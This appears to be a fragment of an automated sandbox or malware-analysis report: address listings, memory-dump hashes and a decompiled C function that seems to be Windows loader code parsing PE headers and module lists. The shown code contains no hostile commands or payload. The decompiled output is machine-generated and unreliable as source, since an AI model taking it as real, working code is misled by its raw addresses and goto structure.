                                                    0x04bb57f3
                                                    0x04bb57f8
                                                    0x00000000
                                                    0x04bb57f8
                                                    0x04bb57e0
                                                    0x04bb57e4
                                                    0x04bb57ea
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb57ea
                                                    0x04b720f4
                                                    0x04b720f4
                                                    0x04b720f8
                                                    0x04b720f8
                                                    0x04b720fc
                                                    0x04b72100
                                                    0x04b72106
                                                    0x04b72201
                                                    0x04b72206
                                                    0x04b7220b
                                                    0x04b7220e
                                                    0x04b722a9
                                                    0x04b722ac
                                                    0x00000000
                                                    0x00000000
                                                    0x04b722b2
                                                    0x04b722b5
                                                    0x04bb5801
                                                    0x04bb5806
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5810
                                                    0x04bb5815
                                                    0x04bb5818
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb581e
                                                    0x04b722bb
                                                    0x04b722bb
                                                    0x04b72218
                                                    0x04b72218
                                                    0x04b7221c
                                                    0x04b72220
                                                    0x04b72222
                                                    0x04b722c2
                                                    0x04b722c4
                                                    0x04b722dc
                                                    0x04b722dc
                                                    0x04b722e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b722e7
                                                    0x04b722c8
                                                    0x04b722cd
                                                    0x04b722d3
                                                    0x04b722d6
                                                    0x04bb5823
                                                    0x04bb5825
                                                    0x04bb5827
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb582d
                                                    0x00000000
                                                    0x04bb582d
                                                    0x00000000
                                                    0x04b72228
                                                    0x04b72228
                                                    0x00000000
                                                    0x04b72228
                                                    0x04b72222
                                                    0x04b72214
                                                    0x04b72214
                                                    0x00000000
                                                    0x04b72114
                                                    0x04b72114
                                                    0x04b72114
                                                    0x04b7211a
                                                    0x04b7211c
                                                    0x04b72348
                                                    0x04b7234d
                                                    0x04bb5840
                                                    0x04bb5845
                                                    0x04bb5848
                                                    0x04bb584e
                                                    0x04bb584e
                                                    0x04bb5848
                                                    0x04b72353
                                                    0x04b72355
                                                    0x04b72388
                                                    0x04b72388
                                                    0x04b72368
                                                    0x04b7236a
                                                    0x04b7236c
                                                    0x04b7238f
                                                    0x00000000
                                                    0x04b7236e
                                                    0x04b7236e
                                                    0x04b7218e
                                                    0x04b7218e
                                                    0x04b72191
                                                    0x04b72195
                                                    0x04bb5a03
                                                    0x04bb5a06
                                                    0x04bb5a0c
                                                    0x04bb5a0f
                                                    0x04bb5a11
                                                    0x04bb5a13
                                                    0x04bb5a13
                                                    0x04bb5a19
                                                    0x04bb5a1f
                                                    0x00000000
                                                    0x04b7219b
                                                    0x04b7219b
                                                    0x04b721a0
                                                    0x04b72282
                                                    0x04b72284
                                                    0x04b72284
                                                    0x04b72284
                                                    0x04b72284
                                                    0x04b721a6
                                                    0x04b721a9
                                                    0x04b721ac
                                                    0x04b721ae
                                                    0x04b721b3
                                                    0x04b7228b
                                                    0x04b72290
                                                    0x04b72379
                                                    0x04b72296
                                                    0x04b72298
                                                    0x04b72298
                                                    0x04b72290
                                                    0x04b721b9
                                                    0x04b721be
                                                    0x04b722a2
                                                    0x04b722a2
                                                    0x04b721c4
                                                    0x04b721c8
                                                    0x04b721cc
                                                    0x04b721d0
                                                    0x04b721d4
                                                    0x04b721de
                                                    0x04b721e3
                                                    0x04bb5a29
                                                    0x04bb5a2c
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5a3b
                                                    0x00000000
                                                    0x04b721e9
                                                    0x04b721e9
                                                    0x04b721e9
                                                    0x04b721ee
                                                    0x04b721f1
                                                    0x04bb5a45
                                                    0x04bb5a4b
                                                    0x04bb5a52
                                                    0x04bb5a58
                                                    0x04bb5a5d
                                                    0x04bb5a5f
                                                    0x04bb5a71
                                                    0x04bb5a61
                                                    0x04bb5a6a
                                                    0x04bb5a6a
                                                    0x04bb5a76
                                                    0x04bb5a79
                                                    0x04bb5a7f
                                                    0x04bb5a83
                                                    0x04bb5a85
                                                    0x04bb5a87
                                                    0x04bb5a87
                                                    0x04bb5a8c
                                                    0x04bb5a91
                                                    0x04bb5a97
                                                    0x04bb5a9f
                                                    0x04bb5aa0
                                                    0x04bb5aa1
                                                    0x04bb5aa6
                                                    0x04bb5aab
                                                    0x04bb5ab1
                                                    0x04bb5ab3
                                                    0x04bb5ab9
                                                    0x04bb5aca
                                                    0x04bb5ad4
                                                    0x04bb5ad4
                                                    0x04bb5ade
                                                    0x04bb5ade
                                                    0x04bb5aab
                                                    0x04bb5a79
                                                    0x04bb5a52
                                                    0x04b721f7
                                                    0x04b721f9
                                                    0x04b721fe
                                                    0x04b721fe
                                                    0x04b721e3
                                                    0x04b72195
                                                    0x04b7236c
                                                    0x04b72122
                                                    0x04b72122
                                                    0x04b72124
                                                    0x04b72231
                                                    0x04b72236
                                                    0x04b72236
                                                    0x04b72238
                                                    0x04b72238
                                                    0x04b72240
                                                    0x04b72242
                                                    0x04b72244
                                                    0x04bb59fc
                                                    0x04b7218c
                                                    0x04b7218c
                                                    0x00000000
                                                    0x04b7218c
                                                    0x04b7224a
                                                    0x04b7224f
                                                    0x04b72256
                                                    0x04b72304
                                                    0x04b72309
                                                    0x04b7230f
                                                    0x04b7231e
                                                    0x04b7231e
                                                    0x04b7231e
                                                    0x04b72320
                                                    0x04b72325
                                                    0x04b7232a
                                                    0x04b7232c
                                                    0x04b7233e
                                                    0x04b7233e
                                                    0x00000000
                                                    0x04b7232c
                                                    0x04b72311
                                                    0x04b72317
                                                    0x04b7231a
                                                    0x04b7231c
                                                    0x04b72380
                                                    0x04b72380
                                                    0x04b72380
                                                    0x04b72384
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72386
                                                    0x00000000
                                                    0x04b7231c
                                                    0x04b7225c
                                                    0x04b7225c
                                                    0x00000000
                                                    0x04b7225c
                                                    0x04b7212a
                                                    0x04b72134
                                                    0x04b72138
                                                    0x04b7213d
                                                    0x04bb5858
                                                    0x04bb5863
                                                    0x04bb5863
                                                    0x04bb5867
                                                    0x04bb586a
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb586c
                                                    0x04bb586c
                                                    0x04bb5871
                                                    0x04bb5875
                                                    0x04bb5877
                                                    0x04bb5997
                                                    0x04bb599c
                                                    0x04bb59a1
                                                    0x04bb59a7
                                                    0x04bb59a7
                                                    0x00000000
                                                    0x04bb59a7
                                                    0x04bb587d
                                                    0x00000000
                                                    0x04bb588b
                                                    0x04bb588b
                                                    0x04bb5890
                                                    0x04bb5892
                                                    0x04bb5894
                                                    0x04bb5899
                                                    0x04bb589b
                                                    0x04bb58a0
                                                    0x04bb58a0
                                                    0x04bb58aa
                                                    0x04bb58b2
                                                    0x04bb58b6
                                                    0x04bb58be
                                                    0x04bb58c6
                                                    0x04bb58c9
                                                    0x04bb590d
                                                    0x04bb5917
                                                    0x04bb591a
                                                    0x04bb591c
                                                    0x04bb5920
                                                    0x04bb5928
                                                    0x04bb592a
                                                    0x04bb592c
                                                    0x04bb592e
                                                    0x04bb592e
                                                    0x04bb58cb
                                                    0x04bb58cd
                                                    0x04bb58d8
                                                    0x04bb58e0
                                                    0x04bb58f4
                                                    0x04bb58fe
                                                    0x04bb58fe
                                                    0x04bb593a
                                                    0x04bb593e
                                                    0x04bb5940
                                                    0x04bb5942
                                                    0x00000000
                                                    0x04bb5944
                                                    0x04bb5944
                                                    0x04bb5949
                                                    0x04bb594e
                                                    0x04bb594e
                                                    0x04bb5953
                                                    0x04bb595b
                                                    0x04bb5976
                                                    0x04bb5976
                                                    0x04bb597a
                                                    0x04bb597f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5981
                                                    0x04bb5981
                                                    0x04bb5981
                                                    0x04bb5983
                                                    0x04bb5988
                                                    0x04bb598d
                                                    0x04bb5991
                                                    0x04bb5991
                                                    0x00000000
                                                    0x04bb595d
                                                    0x04bb595d
                                                    0x04bb5963
                                                    0x04bb5965
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5967
                                                    0x04bb5967
                                                    0x04bb596b
                                                    0x04bb596d
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb596f
                                                    0x04bb5971
                                                    0x04bb5971
                                                    0x04bb5974
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5974
                                                    0x00000000
                                                    0x04bb5967
                                                    0x04bb595b
                                                    0x04bb5942
                                                    0x04bb5863
                                                    0x04b72143
                                                    0x04b72143
                                                    0x04b72149
                                                    0x04b7214f
                                                    0x04b722f1
                                                    0x04b722f6
                                                    0x00000000
                                                    0x04b72173
                                                    0x04b72173
                                                    0x04b7217d
                                                    0x04b72181
                                                    0x04b72186
                                                    0x04bb59ae
                                                    0x04bb59b2
                                                    0x04bb59b5
                                                    0x04bb59b7
                                                    0x04bb59ba
                                                    0x04bb59cd
                                                    0x04bb59d1
                                                    0x04bb59d5
                                                    0x04bb59d9
                                                    0x04bb59db
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb59dd
                                                    0x04bb59dd
                                                    0x04bb59e1
                                                    0x04bb59e4
                                                    0x04bb59e7
                                                    0x04bb59ee
                                                    0x04bb59ee
                                                    0x04bb59f3
                                                    0x04bb59f3
                                                    0x00000000
                                                    0x04b72186
                                                    0x04b7214f
                                                    0x04b72106
                                                    0x04b72266
                                                    0x04b720d8
                                                    0x04b720da
                                                    0x04b720e0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b8caa2b2c1738f5727f580fed1c9cf42f43d20c786694dd194bfe265803ff08b
                                                    • Instruction ID: 9162848b30b0bb00ef72ea3059a7ef3137e023b08522dad1c6e53d047e40d009
                                                    • Opcode Fuzzy Hash: b8caa2b2c1738f5727f580fed1c9cf42f43d20c786694dd194bfe265803ff08b
                                                    • Instruction Fuzzy Hash: A9F1C671608341AFEB29DF28C8407AA77E1EF85358F0489DDE9E59B250E774F841CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B5D5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E04B5D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4c3d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04B56600(0x4c352d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4c37b9c; // 0x0
							_t281 = L04B64620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E04B8F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4c37b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x4c37b8c; // 0xc93d80
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E04B62280(_t200, 0x4c384d8);
									_t277 =  *0x4c385f4; // 0xc92b20
									_t351 =  *0x4c385f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xc92ab8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E04B5FFB0(_t287, _t353, 0x4c384d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E04B9CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04B56600(0x4c352d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04B57926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4c3b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E04BCE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4c38472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x4c3b218; // 0x0
														asm("ror edi, cl");
														 *0x4c3b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04B62280(_t250, 0x4c384d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04B83898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E04B5FFB0(_t293, _t353, 0x4c384d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E04B837F5(_t353, 0);
																}
																E04B80413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04B79B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E04B702D6(_t174);
																}
																L04B677F0( *0x4c37b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E04B7C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L04B5EC7F(_t353);
										L04B719B8(_t287, 0, _t353, 0);
										_t200 = E04B4F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E04B8B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x4c3b2f8; // 0xdf0000
									if((_t206 |  *0x4c3b2fc) == 0 || ( *0x4c3b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x4c3b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04BF6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04BF6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E04B5E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L04B5EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04B89730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E04B5E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04B58F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04B83C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                    0x04b5d5f2
                                                    0x04b5d5f5
                                                    0x04b5d5f5
                                                    0x04b5d5fd
                                                    0x04b5d600
                                                    0x04b5d60a
                                                    0x04b5d60d
                                                    0x04b5d617
                                                    0x04b5d61d
                                                    0x04b5d627
                                                    0x04b5d62e
                                                    0x04b5d911
                                                    0x04b5d913
                                                    0x00000000
                                                    0x04b5d919
                                                    0x04b5d919
                                                    0x04b5d919
                                                    0x04b5d634
                                                    0x04b5d634
                                                    0x04b5d634
                                                    0x04b5d634
                                                    0x04b5d640
                                                    0x04b5d8bf
                                                    0x00000000
                                                    0x04b5d646
                                                    0x04b5d646
                                                    0x04b5d64d
                                                    0x04b5d652
                                                    0x04bab2fc
                                                    0x04bab2fc
                                                    0x04bab302
                                                    0x04bab33b
                                                    0x04bab341
                                                    0x00000000
                                                    0x04bab304
                                                    0x04bab304
                                                    0x04bab319
                                                    0x04bab31e
                                                    0x04bab324
                                                    0x04bab326
                                                    0x04bab332
                                                    0x04bab347
                                                    0x04bab34c
                                                    0x04bab351
                                                    0x04bab35a
                                                    0x00000000
                                                    0x04bab328
                                                    0x04bab328
                                                    0x00000000
                                                    0x04bab328
                                                    0x04bab326
                                                    0x04b5d658
                                                    0x04b5d658
                                                    0x04b5d65b
                                                    0x04b5d665
                                                    0x00000000
                                                    0x04b5d66b
                                                    0x04b5d66b
                                                    0x04b5d66b
                                                    0x04b5d66b
                                                    0x04b5d66d
                                                    0x04b5d672
                                                    0x04b5d67a
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5d680
                                                    0x04b5d686
                                                    0x04b5d8ce
                                                    0x04b5d8d4
                                                    0x04b5d8dd
                                                    0x04b5d8e0
                                                    0x04b5d68c
                                                    0x04b5d691
                                                    0x04b5d69d
                                                    0x04b5d6a2
                                                    0x04b5d6a7
                                                    0x04b5d6b0
                                                    0x04b5d6b5
                                                    0x04b5d6e0
                                                    0x04b5d6b7
                                                    0x04b5d6b7
                                                    0x04b5d6b9
                                                    0x04b5d6b9
                                                    0x04b5d6bb
                                                    0x04b5d6bd
                                                    0x04b5d6ce
                                                    0x04b5d6d0
                                                    0x04b5d6d2
                                                    0x04bab363
                                                    0x04bab365
                                                    0x00000000
                                                    0x04bab36b
                                                    0x00000000
                                                    0x04bab36b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b5d6bf
                                                    0x04b5d6bf
                                                    0x04b5d6e5
                                                    0x04b5d6e7
                                                    0x04b5d6e9
                                                    0x04b5d6ec
                                                    0x04b5d6ec
                                                    0x04b5d6ef
